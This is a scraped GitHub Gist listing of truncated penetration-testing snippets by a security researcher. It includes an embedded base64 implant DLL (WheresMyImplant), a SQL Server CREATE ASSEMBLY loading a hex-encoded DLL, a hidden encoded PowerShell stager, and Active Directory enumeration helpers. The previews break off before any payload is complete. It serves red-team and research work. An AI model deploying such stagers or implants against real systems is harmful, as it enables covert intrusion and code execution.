Scott Sutherland nullbind
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ---------------------------------- | |
| # Get-SQLDomainUser | |
| # ---------------------------------- | |
| # Author: Scott Sutherland | |
| Function Get-SQLDomainUser | |
| { | |
| <# | |
| .SYNOPSIS | |
| Using the OLE DB ADSI provider, query Active Directory for a list of domain users | |
| via the domain logon server associated with the SQL Server. This can be |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This is just a basic PowerShell wrapper for Alexander Leary's WheresMyImplant.dll. | |
| # Source: https://github.com/0xbadjuju/WheresMyImplant/releases | |
| # Note: This was hacked together for the sake of portability. | |
| # Note: To refresh WheresMyImplant.dll do the following: | |
| # $WMIBytes = [System.IO.File]::ReadAllBytes("C:\temp\WheresMyImplant.dll") | |
| # $WMIString = [System.Convert]::ToBase64String($WMIBytes) | |
| # Todo: Write wrapper functions in PowerShell, aaand maybe compress it :). In the meantime a RunCMD method example is below. Create test files and pester tests. | |
| # The WheresMyImplant.dll | |
| $WMIString = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDANqo8FkAAAAAAAAAAOAAAiELAQgAABoBAAAGAAAAAAAA7jgBAAAgAAAAQAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAQAAAgAA7TQBAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAJg4AQBTAAAAAEABADgDAAAAAAAAAAAAAAAAAAAAAAAAAGABAAwAAAAAOAEAHAAAAAAAAAAAAAAAAAA |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ------------------------------------------- | |
| # Function: Get-IPrange | |
| # ------------------------------------------- | |
| # Author: BarryCWT | |
| # Reference: https://gallery.technet.microsoft.com/scriptcenter/List-the-IP-addresses-in-a-60c5bb6b | |
| function Get-IPrange | |
| { | |
| <# | |
| .SYNOPSIS | |
| Get the IP addresses in a range |
nullbind
/ encryptdecryptfunction-cow.cs
Last active
October 15, 2018 19:40
encryptdecryptfunction-cow.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Data; | |
| using System.Data.SqlClient; | |
| using System.Data.SqlTypes; | |
| using Microsoft.SqlServer.Server; | |
| using System.Security.Cryptography; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Text; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -- Change the assembly name to the one you want to replace | |
| CREATE ASSEMBLY [CommonLib] FROM | |
| 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C0103009D50D2590000000000000000E00002210B010B000012000000060000000000000E300000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000B42F00005700000000400000A802000000000000000000000000000000000000006000000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E7465787400000014100000002000000012000000020000000000000000000000000000200000602E72737263000000A8020000004000000004000000140000000000000000000000000000400000402E72656C6F6300000C |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBPAGsAVQAwAGw |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ------------------------------------------- | |
| # Function: Get-DomainObject | |
| # ------------------------------------------- | |
| # Based on Get-ADObject function from: | |
| # https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1 | |
| function Get-DomainObject | |
| { | |
| [CmdletBinding()] | |
| Param( | |
| [Parameter(Mandatory=$false, |
nullbind
/ FindIIS6inNessus.ps1
Last active
December 1, 2018 22:02
This script can be used to extract a list of IIS 6.x HTTP servers from .nessus files.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This script can be used to extract a list of IIS 6.x HTTP servers from .nessus files. | |
| # Author: Scott Sutherland, NetSPI 2017 | |
| # Instructions: Run the script in a directory containing only .nessus files. Super dirty/slow, but functional. | |
| # Create an output table | |
| $outputtbl =New-Object System.Data.DataTable | |
| $outputtbl.Columns.Add("IpAddress") | Out-Null | |
| $outputtbl.Columns.Add("IISVersion") | Out-Null | |
| # Iterate through each host |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Get-WmiObject -Class win32_service | Select Name,ServiceName,Description,PathName,ServiceType,StartMode,Status,InstallDate | |
| #this can be run against all active psremoting sessions |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Get-WmiObject -Class win32_service | Select Name,ServiceName,Description,PathName,ServiceType,StartMode,Status,InstallDate | |
| #this can be run against all active psremoting sessions |